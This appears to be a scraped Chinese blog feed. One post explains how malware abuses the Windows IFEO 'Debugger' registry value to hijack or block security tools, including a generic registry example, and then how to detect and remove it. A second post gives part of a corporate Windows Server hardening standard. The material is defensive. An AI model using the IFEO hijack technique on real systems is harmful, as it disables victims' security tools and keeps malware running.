前面一章里大家应该都了解IFEO的本质了，从实际现象来说，把IFEO直接称为“映像劫持”未免有点冤枉它了，因为里面大部分参数并不会导致今天这种局面的发生，惹祸的参数只有一个，那就是“Debugger”，将IFEO视为映像劫持，大概是因为国内一些人直接套用了“Image File Execution Options”的缩写罢，在相对规范的来自Sysinternals的专业术语里，利用这个技术的设计漏洞进行非法活动的行为应该被称为“Image Hijack”，这才是真正字面上的“映像劫持”！
Debugger参数，直接翻译为“调试器”，它是IFEO里第一个被处理的参数，其作用是属于比较匪夷所思的，系统如果发现某个程序文件在IFEO列表中，它就会首先来读取Debugger参数，如果该参数不为空，系统则会把Debugger参数里指定的程序文件名作为用户试图启动的程序执行请求来处理，而仅仅把用户试图启动的程序作为Debugger参数里指定的程序文件名的参数发送过去！光是这个概念大概就足够一部分人无法理解了，所以我们放简单点说，例如有两个客人在一起吃自助餐，其中一个客人（用户）委托另一个客人（系统）去拿食物时顺便帮自己带点食物回来（启动程序的请求），可是系统在帮用户装了一盘子食物并打算回来时却发现另一桌上有个客人（Debugger参数指定的程序文件）居然是自己小学里的暗恋对象！于是系统直接端着原本要拿给用户的食物放到那桌客人那里共同回忆往事去了（将启动程序请求的执行文件映像名和最初参数组合转换成新的命令行参数……），最终吃到食物的自然就是 Debugger客人（获得命令行参数），至此系统就忙着执行Debugger客人的启动程序请求而把发出最初始启动程序请求的用户和那盘食物（都送给 Debugger客人做命令行参数了）给遗忘了。
在系统执行的逻辑里，这就意味着，当一个设置了IFEO项Debugger参数指定为“notepad.exe”的“iexplore.exe”被用户以命令行参数“-nohome bbs.nettf.net”请求执行时，系统实际上到了IFEO那里就跑去执行notepad.exe了，而原来收到的执行请求的文件名和参数则被转化为整个命令行参数“C:\Program Files\Internet Explorer\IEXPLORE.EXE - nohome bbs.nettf.net”来提交给notepad.exe执行，所以最终执行的是“notepad.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE - nohome bbs.nettf.net”，即用户原来要执行的程序文件名iexplore.exe被替换为notepad.exe，而原来的整串命令行加上 iexplore.exe自身，都被作为新的命令行参数发送到notepad.exe去执行了，所以用户最终看到的是记事本的界面，并可能出现两种情况，一是记事本把整个iexplore.exe都作为文本读了出来，二是记事本弹出错误信息报告“文件名不正确”，这取决于iexplore.exe原来是作为光杆司令状态请求执行（无附带运行命令行参数）的还是带命令行参数执行的。
Debugger参数存在的本意是为了让程序员能够通过双击程序文件直接进入调试器里调试自己的程序，曾经调试过程序的朋友也许会有一个疑问，既然程序启动时都要经过IFEO这一步，那么在调试器里点击启动刚被Debugger参数送进来的程序时岂不是又会因为这个法则的存在而导致再次产生一个调试器进程？微软并不是傻子，他们理所当然的考虑到了这一点，因此一个程序启动时是否会调用到IFEO规则取决于它是否“从命令行调用”的，那么“从命令行调用” 该怎么理解呢？例如我们在命令提示符里执行taskmgr.exe，这就是一个典型的“从命令行调用”的执行请求，而我们在点击桌面上、普通应用程序菜单里的taskmgr.exe时，系统都会将其视为由外壳程序Explorer.exe传递过来的执行请求，这样一来，它也属于“从命令行调用”的范围而触发IFEO规则了。为了与用户操作区分开来，系统自身加载的程序、调试器里启动的程序，它们就不属于“从命令行调用”的范围，从而绕开了IFEO，避免了这个加载过程无休止的循环下去。


从编程角度来说明“命令行调用”，那就是取决于启动程序时CreateProcess是使用lpCommandLine（命令行）还是 lpApplicationName（程序文件名）来执行，默认情况下大部分程序员编写的调用习惯是lpCommandLine——命令行调用

BOOL CreateProcess
(
LPCTSTR lpApplicationName,
LPTSTR lpCommandLine,
LPSECURITY_ATTRIBUTES lpProcessAttributes。
LPSECURITY_ATTRIBUTES lpThreadAttributes,
BOOL bInheritHandles,
DWORD dwCreationFlags,
LPVOID lpEnvironment,

LPCTSTR lpCurrentDirectory,
LPSTARTUPINFO lpStartupInfo,
LPPROCESS_INFORMATION lpProcessInformation
);


由于Debugger参数的这种特殊作用，它又被称为“重定向”（Redirection），而利用它进行的攻击，又被称为“重定向劫持” （Redirection Hijack），它和“映像劫持”（Image Hijack，或IFEO Hijack）只是称呼不同，实际上都是一样的技术手段。
讲解完Debugger参数的作用，现在我们来看看“映像劫持”到底是怎么一回事，遭遇流行“映像劫持”病毒的系统表现为常见的杀毒软件、防火墙、安全检测工具等均提示“找不到文件”或执行了没有反应，于是大部分用户只能去重装系统了，但是有经验或者歪打正着的用户将这个程序改了个名字，就发现它又能正常运行了，这是为什么？答案就是IFEO被人为设置了针对这些流行工具的可执行文件名的列表了，而且Debugger参数指向不存在的文件甚至病毒本身！
以超级巡警的主要执行文件AST.exe为例，首先，有个文件名为kkk.exe的恶意程序向IFEO列表里写入AST.exe项，并设置其 Debugger指向kkk.exe，于是系统就会认为kkk.exe是AST.exe的调试器，这样每次用户点击执行AST.exe时，系统执行的实际上是作为调试器身份的kkk.exe，至于本该被执行的AST.exe，此刻只能被当作kkk.exe的执行参数来传递而已，而由于kkk.exe不是调试器性质的程序，甚至恶意程序作者都没有编写执行参数的处理代码，所以被启动的永远只有kkk.exe自己一个，用户每次点击那些“打不开”的安全工具，实际上就等于又执行了一次恶意程序本体！这个招数被广大使用“映像劫持”技术的恶意软件所青睐，随着OSO这款超级U盘病毒与AV终结者（随机数病毒、8 位字母病毒）这两个灭杀了大部分流行安全工具和杀毒软件的恶意程序肆虐网络以后，一时之间全国上下人心惶惶，其实它们最大改进的技术核心就是利用IFEO 把自己设置为各种流行安全工具的调试器罢了，破解之道尤其简单，只需要将安全工具的执行文件随便改个名字，而这个安全工具又不在乎互斥量的存在，那么它就能正常运行了，除非你运气太好又改到另一个也处于黑名单内的文件名去了，例如把AST.exe改为IceSword.exe。

小知识：互斥量
为了预防用户简单的更改一个文件名就使得大部分安全工具破笼而出，一些木马还同时采用了一种被称为“互斥量”的技术来彻底阻止安全工具运行。在系统里，有一类特殊的系统对象被称为“互斥量”（Mutex），它们的存在是为了减少系统开销而设，例如一些工具在运行时会检测是否已经有另一个自己的副本在运行，要做这种检测最有效率的方法就是在第一次运行时创建一个互斥量，以后再运行时检测即可，这实际上是很简单的方法，因为系统会为我们保存已经创建的互斥量，直到程序请求销毁互斥量，否则它将一直存在。这样一来，问题又出现了，如果恶意程序掌握了一些安全工具的互斥量并伪造呢？这些安全工具就会因为检测到“自身已经运行”而放弃继续执行的权利，恶意程序就没有克星了。

而那些双击时明明程序文件就在眼前，系统却报错说“找不到文件”，又是什么回事呢？这也是IFEO的另一种应用罢了，其秘诀是将Debugger参数指向一个不存在的文件位置，这样系统就会因为找不到这个调试器而无法顺利执行下去，如果系统老老实实报出“找不到调试器”的错误提示那倒还好了，但就不知道微软是出于对IFEO这个东西存在的事实掩盖还是什么苦衷，却死活不肯承认是Debugger指向的调试器不存在导致的错误，而是把已经被“变异”成为命令行参数无法进入系统创建进程机制的原执行请求作为“找不到的文件”给报了回去，于是未曾了解过IFEO的用户只能莫名其妙的看着眼前就存在而系统“不承认”的安全工具发愣了。



四. 防范“映像劫持”
我们现在就来学习如何防范和破解“映像劫持”。
判断你的机器是否被劫持
最简单的方法是逐个运行你常用的安全工具，检查是否出现“无法找到文件”或者干脆直接没了反应的，当然，执行结果和预期差别太大的也要被怀疑为劫持，例如你执行IceSword.exe反而是你的QQ运行了，那就不必我多说了。
其实只要注册表编辑器regedit.exe、regedt32.exe没有被劫持，那我们直接用它进入“HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options”这个注册表项并展开里面的子项列表一个个看下来确认是否出现Debugger参数或其他可能影响程序运行的堆管理参数，便可得知机器是否被劫持。
如果注册表编辑器被劫持了怎么办？直接改个名就能用了啊……
更简单的方法，是使用Sysinternals的Autoruns，点击它的“Image Hijacks”选项卡，即可看到被劫持的程序项了。

追查劫持来源
如果不幸你的机器上已经成为“映像劫持”的受害者，请记录好Debugger指向的程序位置，也不要试图再执行那些安全工具，首先应该尝试删除受影响的 IFEO项，然后刷新注册表看看数据是否马上恢复了，如果马上恢复，则说明后台里有程序正在实时判断和写入IFEO，这时候必须拿出 Sysinternals出品的注册表监控工具Regmon或类似工具，设置Filter为你正在尝试删除的安全工具的IFEO项，很快就能发现具体是什么进程在操作注册表了，然后将IceSword改名（如果已经被劫持），在它的进程列表里将相应进程终止掉。如果这个进程立即又重生了呢？再终止一次，然后迅速点击IceSword的“监视进线程创建”，你就能发现上一次捣乱的程序是什么名字了，将它记录下来，再开启一个Sysinternals的工具 “Process Explorer”，在对应进程上点击右键选择“Suspend”，这个进程就会被挂起，用IceSword和它配合把相关恶意进程都挂起后，再使用 IceSword的文件功能里的“强制删除”，在这个程序还没来得及反应时就把它们的本体给歼灭，这时候再返回Process Explorer里按照大小排列从最大的一个守护进程开始Kill Process即可，由于没有了映像文件存在，它们意欲重新建立木马帝国的贼心也就无法实现了。
如果查杀过程更为复杂的话，请自行参阅相关文章，这里就不再赘述了。

如此实现“免疫”？不被推荐的做法
由于AV终结者搞得人心惶惶，一时间网络上开始流传“免疫映像劫持”甚至“利用映像劫持免疫大部分常见病毒”的做法，对于这些方法的最初提供者，我相信他们的出发点是好的，只是，从严格的角度来看，这却是不可取的。
首先是“免疫映像劫持”，具体的方法是，例如免疫威金病毒“logo_1.exe”，则在IFEO列表里建立一个“logo_1.exe”项，然后设定它的Debugger参数为它自身即“logo_1.exe”，根据原作者解释，其原理是递归死循环：“当Debugger的值等于本身时，就是调用自身来调试自己，结果自己不是调试器，又来一次，递归了，就进入了死循环，也就不能启动了。”
这种方法虽然有效（最后的现象是“找不到文件”），但是它会导致系统在短时间内陷入一个CreateProcess循环和命令参数的字符串累加状态，会消耗一定的资源，最终没能执行程序是因为系统使用CreateProcess启动的实例会被它自身代替执行，从而造成死循环，而且命令行的长度是有系统限制的，到一定范围就会出错了，尤其在可以接受命令行参数的程序里，你甚至会发现硬盘狂转了好一会儿才弹出错误提示，这段时间里就是在死循环传递状态了，最终由于超过系统限制的命令行长度而导致系统传递执行请求时出错，才得以跳出这个死循环，换一个角度来看，如果系统没有限制命令行长度，那么这个操作很可能直接导致系统所有资源都消耗在这个自己反复执行自己的“调试器”上了。
至于“利用映像劫持免疫大部分常见病毒”的做法，发起号召者模仿“映像劫持”后门屏蔽大部分常用安全工具的原理，搜集了许多流行危害程序的可执行文件名加以前面提到的递归死循环方法达到目的，如果不计较前面提到的递归死循环缺点，似乎这个方法是可行的。
然而这真的可行吗？世界上存在许多与某些系统文件同名同姓的社交型后门，如位置不同而名字相同的命令提示符输入法控制程序“conime.exe”（被 OSO超级U盘病毒借用名字）、重要程序Rundll32.exe被某些木马替换为自身、甚至IE浏览器主体iexplore.exe也存在被木马伪造文件名的案例，如此一来不知道多少正常的系统程序可能会被这份“免疫列表”给误杀了，我仅仅粗略浏览了一下就发现msiexec.exe居然存在“免疫列表”中，要知道这可是微软安装程序的主执行体啊……

争议话题：是否禁止IFEO列表权限？
同时，网上还流传着一个让初级用户看不懂的做法，那就是关闭IFEO列表的写入权限，具体操作如下：
•执行32位注册表编辑器regedt32.exe

•定位到HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
•确保焦点在Image File Execution Options上，选择“安全”—“权限”
•将出现的用户列表内所有带有“写入”的权限去掉，确定退出

这样一来，任何对IFEO的写入操作都失效了，也就起了免疫效果。这个方法对一般用户而言还是不错的，除非遭遇到一些特殊的需要往里面写入堆管理参数的程序，否则我建议一般用户还是禁止此项，从而杜绝一切IFEO类病毒来袭。
而争议正在于此，因为从长计议来看，用户很可能会遇到需要往IFEO列表里写入数据的正常程序，彻底禁止了IFEO的写入可能会导致不可预见的后果，既然如此，我们就采取折中的方法好了，使用HIPS（主机入侵防御系统）的注册表防御体系RD（Registry Defend），为我们提供一种两者都能兼顾的IFEO管理方法！
以SSM为例，首先确保RD体系模块已经开启，然后添加新监视规则，“键路径”指向HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options，“操作”为“当更改时报警”，记得“包含值”选上，最后把“子键深度最大值”设为“3”，点击确定生成新的监视规则，然后在“规则”主界面里确保“存取”、“删除”、“写入”的操作均为疑问状态，这是表示在相关键值被进行写入操作时弹出消息询问用户，最后点击“应用设定”让规则生效，从此只需开着SSM，映像劫持就离你远去了。
映像劫持原理：
Windows NT系统在执行一个从命令行调用的可执行文件运行请求时，首先会检查这是否是一个可执行文件，如果是，又是什么格式的，然后就会检查是否存在：
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ImageName]
如果存在，首先会试图读取这个键值：
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ImageName]
"Debugger"="debug_prog"
如果存在，就执行“debug_prog ImageName”

PS：又一个讲解映像劫持的了。。。]]> 2007-12-20 16:42:00 http://86wf.mytupa.com/blog/view.php?id=e62acbd167c61fde6d89e21524b4f164 5.2    域控制器
域控制器的服务推荐配置是在上一节成员服务器配置的基础上，增加如下服务：
服务    启动类型    包括在域控制器基准策略中的理由
分布式文件系统    自动    Active Directory Sysvol 共享所需
DNS 服务器    自动    集成了 Active Directory 的 DNS 所需
文件复制    自动    域控制器间的文件复制所需
Kerberos 密钥发行中心    自动    允许用户使用 Kerberos v5 登录到网络
NT LM 安全支持提供程序    自动    允许客户端使用 NTLM 身份验证登录
RPC 定位器    自动    允许域控制器提供 RPC 名称服务
此外，在域控制器上还有一些服务可能会在具体环境中需要：
    简单邮件传输协议 (SMTP)
可以使用 RPC 或 SMTP 来进行站点间复制。如果在具体环境中使用 SMTP 进行复制，则将需要启用 SMTP 服务。
    站间消息传递服务
此服务用于站点间基于邮件的复制。用于复制的每一种传输协议都在一个单独的外接程序动态链接库 (DLL) 中定义。这些外接程序 DLL 加载到“站间消息传递服务”中。“站间消息传递服务”将发送请求和接收请求定向到适当的传输协议外接程序 DLL，后者将消息路由到目标计算机上的“站间消息传递服务”。如果在具体环境中使用 SMTP 进行复制，则将需要启用此服务。
    IIS Admin 服务
如果启动了 SMTP 服务，那么 IIS Admin 服务也需要启动，因为 SMTP 服务依赖 IIS Admin 服务。
    分布式链接跟踪服务器服务
此服务用来跟踪域中的所有 NTFS 卷上的文件，由运行着“分布式链接跟踪客户机”服务的计算机与之联系。这些计算机将定期不断尝试与“分布式链接跟踪服务器”服务联系，即使在此服务被禁用后也是如此。

6    文件/目录控制
6.1    目录保护
受保护的目录如下表所示：
保护的目录    应用的权限
%systemdrive%\    Administrators：完全控制
System：完全控制
Authenticated Users：读取和执行、列出文件夹内容
%SystemRoot%\Repair
%SystemRoot%\Security
%SystemRoot%\Temp
%SystemRoot%\system32\Config
%SystemRoot%\system32\Logfiles    Administrators：完全控制
Creator/Owner：完全控制
System：完全控制
%systemdrive%\Inetpub    Administrators：完全控制
System：完全控制
Everyone：读取和执行、列出文件夹内容、读取
其中%SystemRoot% 定义了 Windows 系统文件所在的路径和文件夹名，%SystemDrive% 定义了包含 %systemroot% 的驱动器。
6.2    文件保护
受保护的文件如下表所示：
文件    基准权限
%SystemDrive%\Boot.ini    Administrators：完全控制
System：完全控制
%SystemDrive%\Ntdetect.com    Administrators：完全控制
System：完全控制
%SystemDrive%\Ntldr    Administrators：完全控制
System：完全控制
%SystemDrive%\Io.sys    Administrators：完全控制
System：完全控制
%SystemDrive%\Autoexec.bat    Administrators：完全控制
System：完全控制
Authenticated Users：读取和执行、列出文件夹内容、读取
%systemdir%\config    Administrators：完全控制
System：完全控制
Authenticated Users：读取和执行、列出文件夹内容、读取
%SystemRoot%\system32\Append.exe    Administrators：完全控制
%SystemRoot%\system32\Arp.exe    Administrators：完全控制
%SystemRoot%\system32\At.exe    Administrators：完全控制
%SystemRoot%\system32\Attrib.exe    Administrators：完全控制
%SystemRoot%\system32\Cacls.exe    Administrators：完全控制
%SystemRoot%\system32\Change.exe    Administrators：完全控制
%SystemRoot%\system32\Chcp.com    Administrators：完全控制
%SystemRoot%\system32\Chglogon.exe    Administrators：完全控制
%SystemRoot%\system32\Chgport.exe    Administrators：完全控制
%SystemRoot%\system32\Chguser.exe    Administrators：完全控制
%SystemRoot%\system32\Chkdsk.exe    Administrators：完全控制
%SystemRoot%\system32\Chkntfs.exe    Administrators：完全控制
%SystemRoot%\system32\Cipher.exe    Administrators：完全控制
%SystemRoot%\system32\Cluster.exe    Administrators：完全控制
%SystemRoot%\system32\Cmd.exe    Administrators：完全控制
%SystemRoot%\system32\Compact.exe    Administrators：完全控制
%SystemRoot%\system32\Command.com    Administrators：完全控制
%SystemRoot%\system32\Convert.exe    Administrators：完全控制
%SystemRoot%\system32\Cscript.exe    Administrators：完全控制
%SystemRoot%\system32\Debug.exe    Administrators：完全控制
%SystemRoot%\system32\Dfscmd.exe    Administrators：完全控制
%SystemRoot%\system32\Diskcomp.com    Administrators：完全控制
%SystemRoot%\system32\Diskcopy.com    Administrators：完全控制
%SystemRoot%\system32\Doskey.exe    Administrators：完全控制
%SystemRoot%\system32\Edlin.exe    Administrators：完全控制
%SystemRoot%\system32\Exe2bin.exe    Administrators：完全控制
%SystemRoot%\system32\Expand.exe    Administrators：完全控制
%SystemRoot%\system32\Fc.exe    Administrators：完全控制
%SystemRoot%\system32\Find.exe    Administrators：完全控制
%SystemRoot%\system32\Findstr.exe    Administrators：完全控制
%SystemRoot%\system32\Finger.exe    Administrators：完全控制
%SystemRoot%\system32\Forcedos.exe    Administrators：完全控制
%SystemRoot%\system32\Format.com    Administrators：完全控制
%SystemRoot%\system32\Ftp.exe    Administrators：完全控制
%SystemRoot%\system32\Hostname.exe    Administrators：完全控制
%SystemRoot%\system32\Iisreset.exe    Administrators：完全控制
%SystemRoot%\system32\Ipconfig.exe    Administrators：完全控制
%SystemRoot%\system32\Ipxroute.exe    Administrators：完全控制
%SystemRoot%\system32\Label.exe    Administrators：完全控制
%SystemRoot%\system32\Logoff.exe    Administrators：完全控制
%SystemRoot%\system32\Lpq.exe    Administrators：完全控制
%SystemRoot%\system32\Lpr.exe    Administrators：完全控制
%SystemRoot%\system32\Makecab.exe    Administrators：完全控制
%SystemRoot%\system32\Mem.exe    Administrators：完全控制
%SystemRoot%\system32\Mmc.exe    Administrators：完全控制
%SystemRoot%\system32\Mode.com    Administrators：完全控制
%SystemRoot%\system32\More.com    Administrators：完全控制
%SystemRoot%\system32\Mountvol.exe    Administrators：完全控制
%SystemRoot%\system32\Msg.exe    Administrators：完全控制
%SystemRoot%\system32\Nbtstat.exe    Administrators：完全控制
%SystemRoot%\system32\Net.exe    Administrators：完全控制
%SystemRoot%\system32\Net1.exe    Administrators：完全控制
%SystemRoot%\system32\Netsh.exe    Administrators：完全控制
%SystemRoot%\system32\Netstat.exe    Administrators：完全控制
%SystemRoot%\system32\Nslookup.exe    Administrators：完全控制
%SystemRoot%\system32\Ntbackup.exe    Administrators：完全控制
%SystemRoot%\system32\Ntsd.exe    Administrators：完全控制
%SystemRoot%\system32\Pathping.exe    Administrators：完全控制
%SystemRoot%\system32\Ping.exe    Administrators：完全控制
%SystemRoot%\system32\Print.exe    Administrators：完全控制
%SystemRoot%\system32\Query.exe    Administrators：完全控制
%SystemRoot%\system32\Rasdial.exe    Administrators：完全控制
%SystemRoot%\system32\Rcp.exe    Administrators：完全控制
%SystemRoot%\system32\Recover.exe    Administrators：完全控制
%SystemRoot%\system32\Regedit.exe    Administrators：完全控制
%SystemRoot%\system32\Regedt32.exe    Administrators：完全控制
%SystemRoot%\system32\Regini.exe    Administrators：完全控制
%SystemRoot%\system32\Register.exe    Administrators：完全控制
%SystemRoot%\system32\Regsvr32.exe    Administrators：完全控制
%SystemRoot%\system32\Replace.exe    Administrators：完全控制
%SystemRoot%\system32\Reset.exe    Administrators：完全控制
%SystemRoot%\system32\Rexec.exe    Administrators：完全控制
%SystemRoot%\system32\Route.exe    Administrators：完全控制
%SystemRoot%\system32\Routemon.exe    Administrators：完全控制
%SystemRoot%\system32\Router.exe    Administrators：完全控制
%SystemRoot%\system32\Rsh.exe    Administrators：完全控制
%SystemRoot%\system32\Runas.exe    Administrators：完全控制
%SystemRoot%\system32\Runonce.exe    Administrators：完全控制
%SystemRoot%\system32\Secedit.exe    Administrators：完全控制
%SystemRoot%\system32\Setpwd.exe    Administrators：完全控制
%SystemRoot%\system32\Shadow.exe    Administrators：完全控制
%SystemRoot%\system32\Share.exe    Administrators：完全控制
%SystemRoot%\system32\Snmp.exe    Administrators：完全控制
%SystemRoot%\system32\Snmptrap.exe    Administrators：完全控制
%SystemRoot%\system32\Subst.exe    Administrators：完全控制
%SystemRoot%\system32\Telnet.exe    Administrators：完全控制
%SystemRoot%\system32\Termsrv.exe    Administrators：完全控制
%SystemRoot%\system32\Tftp.exe    Administrators：完全控制
%SystemRoot%\system32\Tlntadmin.exe    Administrators：完全控制
%SystemRoot%\system32\Tlntsess.exe    Administrators：完全控制
%SystemRoot%\system32\Tlntsvr.exe    Administrators：完全控制
%SystemRoot%\system32\Tracert.exe    Administrators：完全控制
%SystemRoot%\system32\Tree.com    Administrators：完全控制
%SystemRoot%\system32\Tsadmin.exe    Administrators：完全控制
%SystemRoot%\system32\Tscon.exe    Administrators：完全控制
%SystemRoot%\system32\Tsdiscon.exe    Administrators：完全控制
%SystemRoot%\system32\Tskill.exe    Administrators：完全控制
%SystemRoot%\system32\Tsprof.exe    Administrators：完全控制
%SystemRoot%\system32\Tsshutdn.exe    Administrators：完全控制
%SystemRoot%\system32\Usrmgr.com    Administrators：完全控制
%SystemRoot%\system32\Wscript.exe    Administrators：完全控制
%SystemRoot%\system32\Xcopy.exe    Administrators：完全控制
7    服务器操作系统补丁管理
7.1    确定修补程序当前版本状态
注册表中查看HKLM\Software\  Microsoft\Windows Nt\Currentversion\hotfix键，可以看到打过的补丁对应的修复程序的知识库文章编号。
如果已经部署了  Microsoft Systems Management Server (SMS)，则其软件部署功能可用于将修补程序部署到环境中具有 SMS 客户端的所有计算机，并确认每台计算机所安装的补丁程序的当前版本和状态。
具体操作可以参阅相关的补丁管理规范和流程。

7.2    部署修补程序
可以使用手工执行修补程序的方法安装，修补程序一般是一个可执行文件，其名称表示了修补的信息。如：Q292435_W2K_SP3_x86_en.EXE。
    Q292435 是知识库文章编号，您可在其中查找有关该即时修复程序的详细信息。 
    W2K 是它所针对的产品 (  Microsoft Windows 2000 Server) 
    SP3 是将要包括它的 Service Pack。 
    x86 是它所面向的处理器体系结构。 
    en 是语言（英语）。 
如果安装了  Microsoft Software Update Services (SUS)程序，可以使用SUS集中部署指定范围（指定域或IP地址范围）的主机的修补程序。

8    系统审计日志
应用程序、安全性和系统事件日志的设置都应在域策略中配置并应用到域中的所有成员服务器。建议设置日志大小为10M字节，配置为不改写事件。
审计策略应根据以下设置按照具体需要修改：
策略    计算机设置
审计账户登录事件    成功，失败
审计账户管理    成功，失败
审计目录服务访问    失败
审计登录事件    成功，失败
审计对象访问    成功，失败
审计策略更改    成功，失败
审计特权使用    失败
审计过程追踪    无审计
审计系统事件    成功，失败
限制对应用程序日志的来宾访问    启用
限制对安全日志的来宾访问    启用
限制对系统日志的来宾访问    启用
应用程序日志的保留方法    不要改写事件 (手动清除日志)
安全日志的保留方法    不要改写事件 (手动清除日志)
系统日志的保留方法    不要改写事件 (手动清除日志)
安全审计日志满后关闭计算机    未定义

经常使用其做安全性检查，检查的内容。
9    其它配置安全
9.1    确保所有的磁盘卷使用NTFS文件系统
NTFS文件系统具有更好的安全性, 提供了强大的访问控制机制。
9.2    系统启动设置
配置boot.ini，禁止双重或多重启动，设置系统启动等待时间为零。
9.3    屏幕保护设置
设置在10分钟内主机没有侦测到任何活动（鼠标或键盘操作），系统将自动启动屏幕保护，并需要键入用户密码才能关闭。
9.4    远程管理访问要求
对于Windows的远程管理访问的安全性至少满足以下的要求：
1.    对于远程管理用户的口令必须满足相关的口令要求，详见第三章节的用户账号控制，所有的远程用户登录尝试必须被记录并保留至少180天；
2.    必须使用有效和足够强度的加密算法来保护远程管理访问中传输的信息；
3.    存取控制保证仅仅只有管理员才能够做服务器的远程管理。远程管理软件只接受一个小范围IP地址的连接；
注意：基于以上的安全要求，要禁止运行Windows的Telnet服务。

10    防病毒管理
依据中国××公司病毒防护管理规范。下面是一些特别要求（基于目前Symantec AntiVirus防病毒软件环境）。
    配置至少每周一次自动的全系统病毒扫描;
    配置每天定时自动检查更新病毒定义文件;
    配置对于不可修复文件移至“Quarantine”区;
    对于发现的病毒则要有相关信息提示自动的发送到相关管理人员处。

11    附则
11.1    文档信息
第一条    本策略由公司信息安全办公室制定，并负责解释和修订。由公司信息安全工作组讨论通过，发布执行。
第二条    本策略自发布之日起执行。
11.2    其他信息
]]> 2007-12-20 09:34:52 http://86wf.mytupa.com/blog/view.php?id=8206c9561e743f0daadd3166d565470f 服务器操作系统安全配置标准－Windows

V 1.1

2006年03 月30 日

文档控制

拟 制:    
审 核:    
标准化:    
读 者：    

版本控制

版本    提交日期    相关组织和人员    版本描述
V1.0    2005-12-08        
V1.1    2006-03-30        


1    概述    1
1.1    适用范围    1
1.2    实施    1
1.3    例外条款    1
1.4    检查和维护    1
2    适用版本    2
3    用户账号控制    2
3.1    密码策略    2
3.2    复杂性要求    2
3.3    账户锁定策略    3
3.4    内置默认账户安全    3
3.5    安全选项策略    4
4    注册表安全配置    6
4.1    注册表访问授权    6
4.2    禁止匿名访问注册表    7
4.3    针对网络攻击的安全考虑事项    7
4.4    禁用 8.3 格式文件名的自动生成    8
4.5    禁用 LMHASH 创建    8
4.6    配置 NTLMSSP 安全    8
4.7    禁用自动运行功能    8
4.8    附加的注册表安全配置    9
5    服务管理    9
5.1    成员服务器    9
5.2    域控制器    10
6    文件/目录控制    11
6.1    目录保护    11
6.2    文件保护    12
7    服务器操作系统补丁管理    16
7.1    确定修补程序当前版本状态    16
7.2    部署修补程序    16
8    系统审计日志    16
9    其它配置安全    17
9.1    确保所有的磁盘卷使用NTFS文件系统    17
9.2    系统启动设置    17
9.3    屏幕保护设置    17
9.4    远程管理访问要求    18
10    防病毒管理    18
11    附则    18
11.1    文档信息    18
11.2    其他信息    18

1    概述
本文档规定了中国××公司企业范围内安装有Windows操作系统的主机应当遵循的操作系统安全性设置标准，本文档旨在指导系统管理人员进行Windows操作系统的安全配置。
1.1    适用范围
本规范的使用者包括：
服务器系统管理员、应用管理员、网络安全管理员。
本规范适用的范围包括：
支持中国××公司运行的Windows 2000 Server, Windows 2003服务器系统。
1.2    实施
本规范的解释权和修改权属于中国××公司，在本标准的执行过程中若有任何疑问或建议，应及时反馈。
本标准一经颁布，即为生效。
1.3    例外条款
欲申请本标准的例外条款，申请人必须准备书面申请文件，说明业务需求和原因，送交中国××公司信息系统管理部门进行审批备案。
1.4    检查和维护
根据中国××公司经营活动的需要，每年检查和评估本标准，并做出适当更新。如果在突发事件处理过程中，发现需对本标准进行变更，也需要进行本标准的维护。
任何变更草案将由中国××公司信息系统管理部门进行审核批准。各相关部门经理有责任与其下属的组织和员工沟通变更的内容。
2    适用版本
Windows 2000 Server;
Windows 2003.

3    用户账号控制
基本策略：用户被赋予唯一的用户名、用户ID（UID）。
3.1    密码策略
默认情况下，将对域中的所有服务器强制执行一个标准密码策略。下表列出了一个标准密码策略的设置以及针对您的环境建议的最低设置。
策略    默认设置    推荐最低设置
强制执行密码历史记录    记住 1 个密码    记住 4 个密码
密码最长期限    42 天    42 天
密码最短期限    0 天    0 天
最短密码长度    0 个字符    8 个字符
密码必须符合复杂性要求    禁用    启用
为域中所有用户使用可还原的加密来储存密码    禁用    禁用
3.2    复杂性要求
当组策略的“密码必须符合复杂性要求”设置启用后，它要求密码必须为 6 个字符长（但我们建议您将此值设置为 8 个字符）。它还要求密码中必须包含下面类别中至少三个类别的字符： 
    英语大写字母 A, B, C, … Z 
    英语小写字母 a, b, c, … z 
    西方阿拉伯数字 0, 1, 2, … 9 
    非字母数字字符，如标点符号
3.3    账户锁定策略
有效的账户锁定策略有助于防止攻击者猜出您账户的密码。下表列出了一个默认账户锁定策略的设置以及针对您的环境推荐的最低设置。 
策略    默认设置    推荐最低设置
账户锁定时间    未定义    30 分钟
账户锁定阈值    0    5 次无效登录
复位账户锁定计数器    未定义    30 分钟
3.4    内置默认账户安全
Windows有几个内置的用户账户，它们不可删除，但可以通过禁用，重命名或设置相关的权限的方式来保证一定的系统安全性。
帐户名    建议安全配置策略    适用系统
Administrator    1.    此帐户必须在安装后立即重命名并修改相关密码；
2.    对于系统管理员建议建立一个相关拥有Administrator组权限的新用户，平时使用此帐户登陆，只有在有特殊需要时才使用重命名后的Administrator进行系统登陆。    Windows 2000 Server
Windows Server 2003
Guest    帐户必须禁用；如有特殊需要保留也一定要重命名。    Windows 2000 Server
Windows Server 2003
TSInternetUser    此帐户是为了“Terminal Services’ Internet Connector License”使用而存在的，故帐户必须禁用，不会对于正常的Terminal Services的功能有影响。    Windows 2000 Server
Windows Server 2003
SUPPORT_388945a0    此帐户是为了IT帮助和支持服务，此帐户必须禁用。    Windows Server 2003
IUSR_{system}    必须只能是Guest组的成员。    此帐户为IIS（Internet Information Server）服务建立的。
IWAM_{system}    必须只能是Guest组的成员。    此帐户为IIS（Internet Information Server）服务建立的。

3.5    安全选项策略
域策略中的安全选项应根据以下设置按照具体需要修改：
选项    设置
对匿名连接的附加限制    没有显式匿名权限就无法访问
允许服务器操作员计划任务 (仅用于域控制器)    禁用
允许在未登录前系统关机    禁用
允许弹出可移动 NTFS 媒体    管理员
在断开会话之前所需的空闲时间    15 分钟
对全局系统对象的访问进行审计    禁用
对备份和还原权限的使用进行审计    禁用
登录时间过期就自动注销用户    未定义（见附注）
当登录时间过期就自动注销用户（本地）    启用
在系统关机时清除虚拟内存页面交换文件    启用
对客户端通讯使用数字签名 （始终）    启用
对客户端通讯使用数字签名 (如果可能)    启用
